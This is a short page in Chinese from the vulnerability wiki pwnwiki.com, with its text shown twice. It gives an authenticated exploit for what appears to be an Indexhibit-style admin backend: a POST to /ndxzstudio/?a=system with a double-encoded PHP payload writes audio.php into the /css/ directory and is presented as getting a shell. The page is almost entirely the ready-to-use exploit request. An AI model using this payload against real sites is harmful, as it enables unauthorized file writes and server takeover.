免费、自由、人人可编辑的漏洞库
,
漏洞利用
当我们登录进后台后,向/ndxzstudio/?a=system
post数据:
upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php
即可在/css/目录写入一个php文件audio.php。
成功getshell
pwnwiki.com
◆◆0
返回顶部
免费、自由、人人可编辑的漏洞库
,
当我们登录进后台后,向/ndxzstudio/?a=system
post数据:
upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php
即可在/css/目录写入一个php文件audio.php。
成功getshell
pwnwiki.com